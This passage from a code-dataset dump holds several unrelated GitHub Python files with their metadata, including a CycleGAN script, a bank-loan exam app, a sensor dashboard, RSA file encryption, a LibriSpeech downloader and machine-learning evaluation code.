If ignored, the default files will be image_comparison.svg and image_result.svg')\narg = parser.parse_args()\n\n####################\n# Program Functions#\n####################\n\ndef run():\n if arg.image is not 'None':\n # process image\n image = process_image(arg.image)\n print('Converting ' + arg.image + ' image to ' + arg.convert)\n if arg.convert == 'cartoon':\n # load model\n G_XtoY = load_generator(g_conv_dims, n_res_blocks, 'G_XtoY')\n # set model to eval\n G_XtoY.eval()\n # apply model\n result = G_XtoY(image)\n # plot and save results\n show_results(image, result, arg.filenames)\n elif arg.convert == 'human':\n # load model\n G_YtoX = load_generator(g_conv_dims, n_res_blocks, 'G_YtoX')\n # set model to eval\n G_YtoX.eval()\n # apply model\n result = G_YtoX(image)\n # plot and save results\n show_results(image, result, arg.filenames)\n else:\n raise NotImplementedError('Unknow convert {} parameter. Valid options are: human, cartoon'.format(arg.convert))\n \nif __name__ == '__main__':\n run()\n","repo_name":"LsAntonio/cycle-gan","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26915172318","text":"from Player import Player\nclass PlayerList:\n def __init__(self):\n self.start=None\n self.end=None\n self.temp=None\n def add(self,Name,runs,Avg):\n player=Player(Name,runs,Avg)\n if(self.start==None and self.end==None):\n self.start=player\n self.end=player\n else:\n self.end.next=player\n self.end=player\n def Traversal(self):\n current=self.start\n print(\"Player|\\t\\tRuns|\\t\\tAvg|\")\n while current is not None:\n current.printplayers()\n current=current.next\n def search(self,str):\n current=self.start\n while current is not None:\n if current.Name==str:\n print(\"Player Found\")\n current.printplayers()\n break\n current=current.next\n if current is None:\n print(\"Player not found\")\n def delete(self,str):\n current=self.start\n if(current.Name==str):\n self.start=current.next\n else:\n while(current.next.next is not None):\n if(current.next.Name==str):\n current.next=current.next.next\n current=current.next\n if(current.next.Name==str):\n self.end=current\n self.end.next=None\n\n\n\n","repo_name":"KiranBKL/DSACompetitive","sub_path":"Linkedlist/LinkedlistPython/PlayerList.py","file_name":"PlayerList.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71716156872","text":"from typing import List\n\nfrom project.loans.base_loan import BaseLoan\nfrom project.loans.mortgage_loan import MortgageLoan\nfrom project.loans.student_loan import StudentLoan\n\nfrom project.clients.adult import Adult\nfrom project.clients.base_client import BaseClient\nfrom project.clients.student import Student\n\n\nclass BankApp:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.loans: List[BaseLoan] = []\n self.clients: List[BaseClient] = []\n\n def __object_grep(self, provided_id, class_name):\n # Assuming class_name is the actual class, not a string\n object_grep = next((obj for obj in getattr(self, class_name) if obj.client_id == provided_id), None)\n return object_grep\n\n def add_loan(self, loan_type: str):\n if loan_type != 'StudentLoan' and loan_type != 'MortgageLoan':\n raise Exception(\"Invalid loan type!\")\n # loan = eval(f\"{loan_type}()\")\n if loan_type == 'StudentLoan':\n loan = StudentLoan()\n else:\n loan = 
MortgageLoan()\n self.loans.append(loan)\n return f\"{loan_type} was successfully added.\"\n\n def add_client(self, client_type: str, client_name: str, client_id: str, income: float):\n if client_type not in ['Student', 'Adult']:\n raise Exception(\"Invalid client type!\")\n if len(self.clients) >= self.capacity:\n return \"Not enough bank capacity.\"\n if client_type == 'Student':\n client = Student(client_name, client_id, income)\n else:\n client = Adult(client_name, client_id, income)\n self.clients.append(client)\n return f\"{client_type} was successfully added.\"\n\n def grant_loan(self, loan_type: str, client_id: str):\n # find if client is student or adult and check if the loan type is correct\n # client_object = self.__object_grep(client_id, \"Student\")\n client_object = [c for c in self.clients if c.client_id == client_id][0]\n if (loan_type == 'StudentLoan' and client_object.__class__.__name__ == 'Student') or \\\n (loan_type == \"MortgageLoan\" and client_object.__class__.__name__ == 'Adult'):\n loan = [l for l in self.loans if l.__class__.__name__ == loan_type][0]\n self.loans.remove(loan)\n client_object.loans.append(loan)\n return f\"Successfully granted {loan_type} to {client_object.name} with ID {client_id}.\"\n else:\n raise Exception(\"Inappropriate loan type!\")\n\n def remove_client(self, client_id: str):\n try:\n client_object = [c for c in self.clients if c.client_id == client_id][0]\n except IndexError:\n raise Exception(\"No such client!\")\n if client_object.loans:\n raise Exception(\"The client has loans! Removal is impossible!\")\n self.clients.remove(client_object)\n return f\"Successfully removed {client_object.name} with ID {client_id}.\"\n\n def increase_loan_interest(self, loan_type: str):\n cnt = 0\n for loan in self.loans:\n if loan.__class__.__name__ == loan_type:\n loan.increase_interest_rate()\n cnt += 1\n return f\"Successfully changed {cnt} loans.\"\n\n def increase_clients_interest(self, min_rate: float):\n cnt = 0\n for client in self.clients:\n if client.interest < min_rate:\n client.increase_clients_interest()\n cnt += 1\n return f\"Number of clients affected: {cnt}.\"\n\n def get_statistics(self):\n total_clients_income = sum([c.income for c in self.clients])\n loans_count_granted_to_clients = sum([len(c.loans) for c in self.clients])\n granted_sum = sum([l.amount for c in self.clients for l in c.loans])\n not_granted_sum = sum([l.amount for l in self.loans])\n\n try:\n avg_client_interest_rate = sum([c.interest for c in self.clients]) / len(self.clients)\n except ZeroDivisionError:\n avg_client_interest_rate = 0\n\n result = f\"Active Clients: {len(self.clients)}\\n\"\n result += f\"Total Income: {total_clients_income:.2f}\\n\"\n result += f\"Granted Loans: {loans_count_granted_to_clients}, Total Sum: {granted_sum:.2f}\\n\"\n result += f\"Available Loans: {len(self.loans)}, Total Sum: {not_granted_sum:.2f}\\n\"\n result += f\"Average Client Interest Rate: {avg_client_interest_rate:.2f}\"\n\n return result\n","repo_name":"tsvtln/SoftUniOOP","sub_path":"OOP_exam_5august2023/project/bank_app.py","file_name":"bank_app.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31480099440","text":"import connexion\n\nimport sqlite3\n\n\n\napp = connexion.App(__name__, specification_dir='./')\napp.add_api('cloud.yml')\n\n\n\n@app.route('/')\ndef index():\n\t\n\tconn = sqlite3.connect('dht.db')\n\tc = conn.cursor()\n\tc.execute('SELECT id, devicename, 
reading_time, temperature, humidity, moved, label FROM readings ORDER BY devicename ASC, reading_time DESC')\n\tresults = c.fetchall()\n\n\thtmlTableRows = ''\n\n\tfor result in results:\n\t\t\n\t\thtmlTableRows += '<tr><td>' + str(result[0]) + '</td><td>' + str(result[1]) + '</td><td>' + str(result[2]) + '</td><td>' + str(result[3]) + '</td><td>' + str(result[4]) + '</td><td>' + str(result[5]) + '</td><td>' + str(result[6]) + '</td></tr>'\n \n\thtml = '<html><head><title>Cloud Server</title></head>' \n\thtml += '<body><h1>Global Historical Sensor Data</h1><table border=1>' + htmlTableRows + '<tr><th>ID</th><th>Device Name</th><th>Timestamp</th><th>Temperature</th><th>Humidity</th><th>Moving People</th><th>Model</th></tr></table></body></html>
'\n\n\tc.close()\n\tconn.close()\n\n\treturn html\n\n\n\n# If we're running in stand alone mode, run the application\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"nanfang-wuyu/web-app-NUS","sub_path":"Real-Time Prediction/Cloud/aiot-cloud.py","file_name":"aiot-cloud.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4963967911","text":"from database.connection import DBConnection\nfrom crypto.rsa import RSA\nfrom pathlib import Path\nfrom utilities.fileutils import reconstruct_file_content\nimport uuid\nimport os\n\n\ndef add(file_path, enc_location):\n \"\"\"\n :param file_path:\n The path of the file we wish to encrypt.\n :param enc_location:\n The location where we will save the encryption\n :return:\n True, if successful. (if not successful it will raise a ValueError)\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be added to the database\")\n\n name = Path(file_path).name\n n, e, d = RSA.generate_rsa_keypair()\n fs, chunk_size, enc = RSA.encrypt_file(file_path, n, e)\n uid = str(uuid.uuid4())\n full_name = uid + \"_\" + name\n\n save_location = enc_location + r\"\\\\\" + full_name\n print(\"SAVING AT: \" + save_location)\n with open(save_location, 'w') as f:\n to_write = \"\"\n for num in enc:\n to_write += str(num)\n to_write += \" \"\n\n f.write(to_write)\n f.close()\n\n conn = DBConnection()\n file_object = {\n \"uid\": uid,\n \"name\": name,\n \"n\": str(n),\n \"e\": str(e),\n \"d\": str(d),\n \"file_size\": str(fs),\n \"chunk_size\": str(chunk_size)\n }\n conn.add_one_file(file_object)\n return True\n\n\ndef delete(file_path):\n \"\"\"\n :param file_path:\n The path of the encrypted file that we want to delete from the database.\n :return:\n True, if successful, else False.\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be deleted from the database\")\n\n name = Path(file_path).name\n split_name = name.split(\"_\")\n if len(split_name) != 2:\n raise ValueError(\"The input file must have a name of type: uid_filename\")\n\n uid, file_name = split_name\n conn = DBConnection()\n files_found = conn.get_file_by_id(uid)\n\n if len(files_found) == 0:\n print(\"[Delete]No files found...\")\n return False\n elif len(files_found) > 1:\n print(\"[Delete]Too many matches for uid\")\n return False\n\n file_obj = files_found[0]\n deleted = conn.delete_one_file(file_obj[\"uid\"])\n if deleted == 0:\n print(\"[Delete]Found nothing to delete\")\n return False\n elif deleted > 1:\n print(\"[Delete]Warning! 
More than one record deleted!\")\n\n os.remove(file_path)\n return True\n\n\ndef read(file_path, dec_location):\n \"\"\"\n :param file_path:\n The path to the encrypted file we want to read.\n :param dec_location:\n The location where the decryption will be stored\n :return:\n True if successful, else False.\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be read from the database\")\n\n name = Path(file_path).name\n split_name = name.split(\"_\")\n if len(split_name) != 2:\n raise ValueError(\"The input file must have a name of type: uid_filename\")\n uid, file_name = split_name\n conn = DBConnection()\n files_found = conn.get_file_by_id(uid)\n\n if len(files_found) == 0:\n print(\"[Read]No files found...\")\n return False\n elif len(files_found) > 1:\n print(\"[Read]Too many matches for uid\")\n return False\n\n file_obj = files_found[0]\n n = int(file_obj[\"n\"])\n d = int(file_obj[\"d\"])\n file_size = int(file_obj[\"file_size\"])\n chunk_size = int(file_obj[\"chunk_size\"])\n\n with open(file_path, 'r') as f:\n content = f.read()\n content = content.split(\" \")\n content.pop()\n content = [int(i) for i in content]\n f.close()\n\n decryption = RSA.decrypt_file_content(content, n, d)\n file_content = reconstruct_file_content(file_size, chunk_size, decryption)\n save_location = dec_location + r\"\\\\\" + file_name\n print(\"READING INTO: \" + save_location)\n with open(save_location, 'wb') as f:\n f.write(file_content)\n f.close()\n\n return True\n","repo_name":"robbyyt/EncryptedDatabase","sub_path":"functionalities/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22571045585","text":"# Downloading, Unzipping and Extracting the \" LibriSpeech Dataset \"\r\n# URL : 'https://www.openslr.org/12/'\r\n\r\nimport requests\r\nimport tarfile\r\nimport os\r\nfrom tqdm import tqdm\r\n\r\n# Define the URLs of the files\r\nurls = [\r\n 'https://www.openslr.org/resources/12/train-clean-100.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-clean-360.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-other-500.tar.gz',\r\n 'https://www.openslr.org/resources/12/test-clean.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-other.tar.gz'\r\n]\r\n\r\n# Define the desired filenames\r\ndesired_files = [\r\n 'train-clean-100.tar.gz',\r\n 'train-clean-360.tar.gz',\r\n 'train-other-500.tar.gz',\r\n 'test-clean.tar.gz',\r\n 'train-other.tar.gz'\r\n]\r\n\r\n# Create a directory to store the downloaded files\r\ndownload_dir = 'data'\r\nos.makedirs(download_dir, exist_ok=True)\r\n\r\n# Iterate over the URLs and desired filenames\r\nfor url, filename in zip(urls, desired_files):\r\n print(f'Downloading {filename}...')\r\n \r\n # Download the file\r\n response = requests.get(url, stream=True)\r\n total_size = int(response.headers.get('content-length', 0))\r\n block_size = 1024\r\n progress_bar = tqdm(total=total_size, unit='iB', unit_scale=True)\r\n \r\n with open(os.path.join(download_dir, filename), 'wb') as f:\r\n for data in response.iter_content(block_size):\r\n progress_bar.update(len(data))\r\n f.write(data)\r\n progress_bar.close()\r\n \r\n print(f'{filename} downloaded.')\r\n\r\n print(f'Extracting {filename}...')\r\n \r\n # Extract the file\r\n with tarfile.open(os.path.join(download_dir, filename), 'r:gz') as tar:\r\n total_members = len(tar.getmembers())\r\n progress_bar = tqdm(tar.getmembers(), 
total=total_members)\r\n\r\n for member in progress_bar:\r\n progress_bar.set_description(f\"Extracting {member.name}\")\r\n tar.extract(member, path='./LibriSpeech')\r\n\r\n progress_bar.close()\r\n \r\n print(f'{filename} extracted.')\r\n\r\nprint('All files downloaded and extracted successfully.')\r\n\r\n","repo_name":"nandy-candy101/Speech-Processing","sub_path":"LibriSpeech_download.py","file_name":"LibriSpeech_download.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15997401125","text":"import torch\nfrom c2far.ml.evaluators.evaluator import Evaluator\n\n\nclass GenerationEvaluator(Evaluator):\n \"\"\"Class to help with testing of multi-step-ahead generation.\"\"\"\n LABEL = \"GenerationEvaluator\"\n\n def __init__(self, batch_pred, device):\n \"\"\"Pass in the batch predictor and the device (torch.device, not the\n string).\n\n Arguments:\n\n batch_pred: BatchPredictor, which we call to generate\n predictions.\n\n device: torch.device (not the string), onto which we place the\n tensors.\n\n \"\"\"\n super().__init__(device)\n self.batch_pred = batch_pred\n\n def _make_outputs(self, inputs, targets, originals):\n \"\"\"Override the make_outputs part with our generation-specific forward\n pass. I.e., no longer do one-step-ahead logit prediction, but\n rather return quantiles over the whole prediction window.\n\n We do this in concert with developing a new criterion, which\n can give us the metrics we want over the future.\n\n Returns:\n\n outputs, Tensor: NSEQ x NBATCH x N, where the last GSIZE of\n the NSEQ dimension has the prediction. N may be 3 if we have\n confidence > 0 and are doing lows, p50s, highs. Or it may be\n 9 if we are doing all the levels for WQL.\n\n \"\"\"\n # We already have inputs, targets, and values (genmode=False\n # in the client that calls this). But we ditch all that and\n # just do multi-step generation using originals, because then\n # we can just use the batch_predictor (genmode=True):\n csize, gsize = self.batch_pred.get_csize_gsize()\n if len(originals) != csize + gsize + 2:\n raise RuntimeError(\"Using originals that do not match given csize/gsize\")\n originals = originals[:csize + 2]\n originals = originals.squeeze(2).transpose(0, 1)\n ptiles = self.batch_pred(originals)\n preds = torch.stack(ptiles, 2)\n # These are NBATCH x GSIZE x N (e.g. N=3 for lows, p50s,\n # highs, N=9 when doing WQL). Let's transpose so we have GSIZE x NBATCH x N.\n preds = preds.transpose(0, 1)\n # Note these only have PREDICTIONS. But eval code expects the\n # whole sequence. 
So let's stick the preds at the end of this:\n my_gsize, nbatch, nptiles = preds.shape\n nseq = csize + gsize\n outputs = torch.zeros(nseq, nbatch, nptiles, device=self.device)\n outputs[-gsize:, :, :] = preds\n return outputs\n\n def __str__(self):\n \"\"\"Provide a wee bit more info here.\"\"\"\n return f\"{self.LABEL}.{self.batch_pred}\"\n","repo_name":"huaweicloud/c2far_forecasting","sub_path":"c2far/ml/evaluators/generation_evaluator.py","file_name":"generation_evaluator.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"20230576017","text":"'''\nCompute metrics for output of trained models\n'''\n\nimport os\nimport sys\n\nsys.path.insert(1, os.path.join(sys.path[0], '../'))\n\nimport argparse\nimport datetime\nimport json\nimport re\nimport torch\nimport nltk\nimport numpy as np\nimport time\nimport warnings\nimport cmudict\nimport pyter\n\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Dict, List\nfrom tqdm import tqdm\nfrom models.MBarts import get_model\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer, MBart50TokenizerFast\n\n# from LM.ngram.language_model import LanguageModel\nfrom metrics import (\n BoundaryRecall\n)\nfrom utils_common.utils import (\n RhymeUtil, save_json, PosSeg,\n FluencyCaculator,\n # , # PerpCaculator #, FluencyCaculator2\n calculate_acc_2d,\n)\nfrom utils.utils import (\n calculate_rouge,\n chunks,\n parse_numeric_n_bool_cl_kwargs,\n use_task_specific_params,\n calculate_sacrebleu,\n calculate_sentence_bleu,\n)\n\n\ndef compute_scores(args):\n \"\"\"\n Compute metrics values for output text (given reference text).\n Reference text is optional.\n \"\"\"\n\n # if os.path.exists(args.score_path):\n # raise Exception('score_path {} exists!'.format(args.score_path))\n # ----------\n\n # Read output and reference\n with open(args.output_path) as f:\n outputs = [x.rstrip() for x in f.readlines()]\n if args.reference_path != None:\n with open(args.reference_path) as f:\n references = [x.rstrip() for x in f.readlines()]\n else:\n references = None\n\n output_lns = outputs\n reference_lns = references\n if os.path.exists(args.constraint_path):\n constraint_lns = [x.rstrip() for x in open(args.constraint_path).readlines()]\n constraint_stress_lns = [x.rstrip() for x in\n open(args.constraint_path.replace('.target', '_boundary.target')).readlines()]\n else:\n print('Constraint path not exist: {}'.format(args.constraint_path))\n constraint_lns = None\n if constraint_lns != None:\n assert len(output_lns) == len(reference_lns) == len(constraint_lns)\n\n # Compute scores\n scores: dict = calculate_sacrebleu(output_lns, reference_lns)\n\n if constraint_lns != None:\n # Read constraint target\n tgt_lens, tgt_rhymes = [], []\n for l in constraint_lns:\n t1, t2 = [int(i) for i in l.split('\\t')]\n tgt_lens.append(t1)\n tgt_rhymes.append(t2)\n\n # Compute format accuracy\n out_lens = [len(i.strip()) for i in output_lns]\n len_acc = calculate_acc(out=out_lens, tgt=tgt_lens)\n scores['format_accuracy'] = len_acc\n\n # Compute rhyme accuracy\n rhyme_util = RhymeUtil()\n if 'rev' in args.output_path:\n print('rhyme in reverse order')\n print(output_lns[0])\n out_rhymes = [rhyme_util.get_rhyme_type_of_line(line[::-1]) for line in output_lns]\n else:\n print('rhyme in normal order')\n print(output_lns[0])\n out_rhymes = [rhyme_util.get_rhyme_type_of_line(line) for line in output_lns]\n print(out_rhymes[:10], tgt_rhymes[:10])\n rhyme_acc 
= calculate_acc(out=out_rhymes, tgt=tgt_rhymes)  # no need for an unconstrained token, because there is no 0 in the rhyme targets of the valid and test sets\n        scores['rhyme_accuracy'] = rhyme_acc\n\n        # Compute stress pattern accuracy\n        if 'rev' in args.output_path:\n            out_lines = [i[::-1] for i in output_lns]  # convert the output to normal order\n        else:\n            out_lines = output_lns\n        boundary_util = BoundaryRecall()\n        boundary_recall = boundary_util.boundary_recall_batch(out_lines, constraint_stress_lns)\n        scores['boundary_recall'] = boundary_recall\n\n        # Compute Translate Edit Rate (TER)\n        ters = [pyter.ter(out, ref) for out, ref in zip(output_lns, reference_lns)]\n        ter = sum(ters) / len(ters)\n        scores['TER'] = ter\n\n        # # Compute fluency (SLOR metric)\n        # if 'rev' in args.output_path:\n        #     output_lns = [s[::-1] for s in output_lns]\n        # slors, perps, lm_probs, uni_probs = FluencyCaculator.compute_slor(output_lns)\n        # # slors = FluencyCaculator.compute_lm_probability(output_lns)\n        # v_min, v_max = np.min(slors), np.max(slors)\n        # # print(v_min, v_max)\n        # # slors = FluencyCaculator.normalize_to_0_and_1(slors, -3.796, 10.232) # min and max need to be updated each time\n        # slor = sum(slors) / len(slors)\n\n        def geo_mean(iterable):\n            a = np.array(iterable)\n            return a.prod() ** (1.0 / len(a))\n\n        # Compute perplexity\n        # calc = PerpCaculator()\n        # perp = geo_mean(perps)\n        # perp = calc(output_lns)\n        perp = 0\n\n        # lm_prob = sum(lm_probs) / len(lm_probs)\n        # uni_prob = sum(uni_probs) / len(uni_probs)\n        # scores['SLOR'] = (slor, v_min, v_max)\n        scores['Perplexity'] = perp\n        # scores['LM prob'] = lm_prob\n        # scores['Unigram Prob'] = uni_prob\n\n    # Save result\n    save_json(scores, args.score_path)\n\n    # Metric for result comparison file\n    bleus = calculate_sentence_bleu(output_lns, reference_lns)  # Sentence-level BLEU\n    scores = {'bleu': ['{:.4f}'.format(i) for i in bleus]}\n    if constraint_lns != None:\n        ch_count = ['{} / {}'.format(i, j) for i, j in zip(out_lens, tgt_lens)]\n        rhy_result = ['{} / {}'.format(i, j) for i, j in zip(out_rhymes, tgt_rhymes)]\n        scores['len'] = ch_count\n        scores['rhyme'] = rhy_result\n    generate_result_comparison_file(args.source_path, args.output_path, args.reference_path, scores=scores)\n\n    return\n\n\ndef count_characters(outputs, refs):\n    '''\n    given all output and reference lines\n    count the number of characters of each line\n    return actual_count / target_count\n    '''\n    pass\n\n\ndef calculate_acc(out, tgt, unconstrained_token=None):\n    '''\n    Calculate the ratio of same elements\n    '''\n    assert len(out) == len(tgt)\n    cnt_same = 0\n    for i in range(len(out)):\n        if out[i] == tgt[i]:\n            cnt_same += 1\n        elif unconstrained_token != None:\n            if tgt[i] == unconstrained_token:\n                cnt_same += 1\n    return cnt_same / len(out)\n\n\ndef calculate_len_dif_with_target_len(output_lns, desired_length):\n    '''\n    Compute the average and maximum length difference between the output and the desired length\n    pred: the outputs of one batch\n    tgt: the target lengths for that batch\n    return: [avg_len_dif, max_len_dif]\n    '''\n    assert len(output_lns) == len(desired_length)\n    sentence_num = min(len(output_lns), len(desired_length))\n    dif_sum = 0\n    max_dif = 0\n    for out_s, tgt_s in zip(output_lns, desired_length):\n        out_s = re.sub(r\"(?![\\u4e00-\\u9fa5]).\", \"\", out_s).strip()\n        dif = abs(len(out_s) - tgt_s)\n        dif_sum += dif\n        if dif > max_dif:\n            max_dif = dif\n    return np.array([dif_sum / sentence_num, max_dif])\n\n\ndef generate_result_comparison_file(src_path, output_path, ref_path, scores):\n    '''\n    Generate a result comparison file to compare the generation 
result with ground truth.\n scores is a dict that looks like:\n scores = {\n bleu: [bleu of all sentences],\n ter: [ter of all sentences],\n }\n '''\n with open(src_path, 'r') as f:\n srcs = f.readlines()\n with open(output_path, 'r') as f:\n outputs = f.readlines()\n with open(ref_path, 'r') as f:\n refs = f.readlines()\n srcs = [s.strip() for s in srcs]\n outputs = [s.strip() for s in outputs]\n refs = [s.strip() for s in refs]\n if 'rev' in output_path:\n # print('rev in output path')\n # print(refs[:10])\n refs = [s[::-1] for s in refs]\n outputs = [s[::-1] for s in outputs]\n # print('rev not in out path')\n # print(refs[:10])\n # exit(10)\n\n # Construct file content\n ret = '----------------------------------------\\n'\n for i in range(len(outputs)):\n ret += 'Sentence {}'.format(i + 1)\n for k in scores:\n ret += ' | {}: {}'.format(k, scores[k][i])\n ret += '\\n'\n src_s = srcs[i]\n ref_s = refs[i]\n out_s = outputs[i]\n ret += 'src: {}\\n' \\\n 'ref: {}\\n' \\\n 'out: {}\\n' \\\n '----------------------------------------\\n'.format(src_s, ref_s, out_s)\n\n with open(output_path.replace('output.txt', 'result.txt'), 'w') as f:\n f.write(ret)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--source_path\", type=str, required=True, help=\"like cnn_dm/test_output.txt.\")\n parser.add_argument(\"--output_path\", type=str, required=True, help=\"like cnn_dm/test_output.txt.\")\n parser.add_argument(\"--constraint_path\", type=str, required=True, help=\"like cnn_dm/test.target\")\n parser.add_argument(\"--reference_path\", type=str, required=False, help=\"like cnn_dm/test.target\")\n parser.add_argument(\"--score_path\", type=str, required=True, default=\"metrics.json\", help=\"where to save metrics\")\n\n args = parser.parse_args()\n\n compute_scores(args)\n","repo_name":"Sonata165/ControllableLyricTranslation","sub_path":"BartFinetune/compute_metrics.py","file_name":"compute_metrics.py","file_ext":"py","file_size_in_byte":9031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"20946866628","text":"import logging\nimport chainer\nfrom chainerrl.agents import a3c\nfrom chainer import functions as F\nimport numpy as np\n\n# Render imports\nimport gym\nimport skimage\nfrom skimage.transform import resize\nfrom skimage.color import rgb2gray\nfrom skimage.color import gray2rgb\nfrom chainerrl.misc.batch_states import batch_states\n\n\nclass SaliencyA3C(a3c.A3C):\n\n process_idx = None\n saved_attributes = ['model', 'optimizer']\n \n def __init__(self, model, optimizer, t_max, gamma, beta=1e-2,\n process_idx=0, phi=lambda x: x,\n pi_loss_coef=1.0, v_loss_coef=0.5,\n keep_loss_scale_same=False,\n normalize_grad_by_t_max=False,\n use_average_reward=False, average_reward_tau=1e-2,\n act_deterministically=False,\n average_entropy_decay=0.999,\n average_value_decay=0.999,\n batch_states=batch_states):\n \n super(SaliencyA3C, self).__init__(\n model=model,\n optimizer=optimizer,\n t_max=t_max,\n gamma=gamma,\n beta=beta,\n process_idx=process_idx,\n phi=phi,\n pi_loss_coef=pi_loss_coef,\n v_loss_coef=v_loss_coef,\n keep_loss_scale_same=keep_loss_scale_same,\n normalize_grad_by_t_max=normalize_grad_by_t_max,\n use_average_reward=use_average_reward,\n average_reward_tau=average_reward_tau,\n act_deterministically=act_deterministically,\n average_entropy_decay=average_entropy_decay,\n average_value_decay=average_value_decay,\n batch_states=batch_states\n )\n\n # Render agent input\n 
self.viewer_value = None\n self.viewer_logit = None\n self.render = True\n\n def act(self, obs):\n # Use the process-local model for acting\n if chainer.config.train:\n # Training\n with chainer.no_backprop_mode():\n statevar = self.batch_states([obs], np, self.phi)\n pout, _ = self.model.pi_and_v(statevar)\n \n if self.act_deterministically:\n return pout.most_probable.data[0]\n else:\n return pout.sample().data[0]\n else:\n # Testing\n self.model.cleargrads()\n\n statevar = chainer.Variable(self.batch_states(\n [obs], np, self.phi))\n pout, vout = self.model.pi_and_v(statevar)\n\n # Compute saliency maps\n saliency_map_logit = self._obtain_saliency_logit(pout, statevar)\n\n self.model.cleargrads()\n \n saliency_map_value = self._obtain_saliency_value(vout, statevar)\n\n # Compute saliency prob\n \n # render\n self._render(statevar.data[-1][-1], saliency_map_logit,\n saliency_map_value)\n \n if self.act_deterministically:\n return pout.most_probable.data[0]\n else:\n return pout.sample().data[0]\n \n def _obtain_saliency_value(self, v, statevar):\n v.backward()\n\n inputgrad = statevar.grad\n\n # print \"LINALGNORM \", np.linalg.norm(inputgrad[-1][-1], ord=2)\n # print \"NPMAX \", np.max(inputgrad[-1][-1])\n \n # Pick last image\n return np.abs(inputgrad[-1][-1])\n\n def _obtain_saliency_logit(self, p, statevar):\n \n p_max_logit = F.max(p.logits)\n p_max_logit.backward()\n inputgrad = statevar.grad\n\n return np.abs(inputgrad[-1][-1])\n\n def _render(self, raw_img, saliency_logit, saliency_value, close=False):\n img = np.zeros((raw_img.shape[0], raw_img.shape[1], 3))\n \n if close:\n if self.viewer_value is not None:\n self.viewer_value.close()\n self.viewer_value = None\n\n if self.viewer_logit is not None:\n self.viewer_logit.close()\n self.viewer_logit = None\n return\n\n # Pick last screen\n img[:, :, 0] = saliency_value * 200\n img[:, :, 1] = raw_img * 255\n img[:, :, 2] = raw_img * 255\n\n img = resize(img, (250, 250))\n\n# img = gray2rgb(raw_img*255)\n img = img.astype(np.uint8)\n \n from gym.envs.classic_control import rendering\n\n if self.viewer_value is None:\n self.viewer_value = rendering.SimpleImageViewer()\n self.viewer_value.imshow(img)\n\n # show logit\n # Pick last screen\n\n img = np.zeros((raw_img.shape[0], raw_img.shape[1], 3))\n img[:, :, 0] = raw_img * 255\n img[:, :, 1] = saliency_logit * 200\n img[:, :, 2] = raw_img * 255\n\n img = resize(img, (250, 250))\n\n# img = gray2rgb(raw_img*255)\n img = img.astype(np.uint8)\n\n if self.viewer_logit is None:\n self.viewer_logit = rendering.SimpleImageViewer()\n self.viewer_logit.imshow(img)\n\n \n","repo_name":"hmightypirate/guided-backprop-chainerrl","sub_path":"examples/mygym/saliency_a3c.py","file_name":"saliency_a3c.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"74353945352","text":"import re\n\ndata = open(\"input.txt\").read().split(\"\\n\\n\")\nextractions = [int(x) for x in data[0].split(\",\")]\n\n\nboards = [\n [[int(el) for el in re.findall(r\"\\d+\", row)] for row in board.strip().split(\"\\n\")]\n for board in data[1:]\n]\n\n\ndef board_win(board, marked):\n for row in board:\n row_win = True\n\n for el in row:\n if el not in marked:\n row_win = False\n\n if row_win:\n return True\n\n for i in range(len(board[0])):\n column_win = True\n\n for row in board:\n if row[i] not in marked:\n column_win = False\n\n if column_win:\n return True\n\n return False\n\n\ndef board_score(board, marked):\n unmarked = 
sum(sum(el for el in row if el not in marked) for row in board)\n\n    return unmarked * marked[-1]\n\n\ndef part1(extractions, boards):\n    for i in range(len(extractions)):\n        for board in boards:\n            if board_win(board, extractions[:i + 1]):\n                return board_score(board, extractions[:i + 1])\n\n\ndef part2(extractions, boards):\n    for i in range(len(extractions)):\n        # iterate over a copy so removing boards is safe\n        for board in boards.copy():\n            if board_win(board, extractions[:i + 1]):\n                if len(boards) == 1:\n                    return board_score(board, extractions[:i + 1])\n                else:\n                    boards.remove(board)\n\n\nprint(part1(extractions, boards))\nprint(part2(extractions, boards))\n","repo_name":"davidemerli/advent-of-code","sub_path":"2021/day04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"38357342684","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 2 16:25:51 2018\n\n@author: brich\n\"\"\"\n'''\n40. Write a Python program to split a list based on first character of word. \n\nfrom itertools import groupby\nfrom operator import itemgetter\n\nword_list = ['be','have','do','say','get','make','go','know','take','see','come','think',\n             